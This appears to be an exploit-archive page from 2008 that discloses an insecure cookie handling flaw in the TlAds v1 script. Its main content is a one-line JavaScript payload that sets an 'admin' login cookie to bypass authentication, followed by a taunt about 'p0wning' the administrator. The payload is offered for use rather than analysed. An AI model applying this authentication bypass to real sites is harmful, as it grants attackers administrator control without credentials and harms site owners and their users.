[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : TlAds v1 Remote Insecure Cookie Handling Vulnerability
# Published : 2008-10-27
# Author : x0r
# Previous Title : Persia BME E-Catalogue Remote SQL Injection Vulnerability
# Next Title : e107 Plugin alternate_profiles (id) SQL Injection Vulnerability


##############################
# TlAds v 1 => Insecure Cookie Handling
#
# Found By : x0r - Evolution Team
#
# Download: http://www.easy-script.com/scripts-dl/tlads-1.zip
###############################

Exploit:

javascript:document.cookie = "tlAds_login=admin; path=/"

Stupid Admin ! P0wned :P

Grazie Al Mio Amore...Ti Amo Da Morire Margherita :P


#Proud To Be Italian 

# www.Syue.com [2008-10-27]